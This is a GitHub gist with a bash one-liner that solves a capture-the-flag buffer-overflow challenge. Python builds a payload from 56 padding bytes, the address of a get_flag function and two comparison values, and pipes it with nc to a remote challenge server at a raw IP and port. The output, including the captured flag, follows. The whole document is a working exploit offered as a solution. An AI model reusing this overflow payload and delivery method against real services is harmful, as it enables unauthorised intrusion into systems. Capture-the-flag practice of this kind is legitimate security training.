Skip to content

Instantly share code, notes, and snippets.

@ChOkO08
Created December 24, 2016 02:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ChOkO08/3a1d7eadf482f5f4d0d757a2609658f2 to your computer and use it in GitHub Desktop.
Save ChOkO08/3a1d7eadf482f5f4d0d757a2609658f2 to your computer and use it in GitHub Desktop.
#!/bin/bash
# \xa0\x89\x04\x08 <get_flag>:
# \x4f\xd6\x8c\x30 # 1st cmp
# \xd1\x19\x57\x19 # 2nd cmp
python -c 'print "A" * 56 + "\xa0\x89\x04\x08" + "ret" + "\x4f\xd6\x8c\x30" + "\xd1\x19\x57\x19"' | nc 54.175.35.248 8005
Qual a palavrinha magica? 3DS{b0f_pr4_c0m3c4r_n3}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment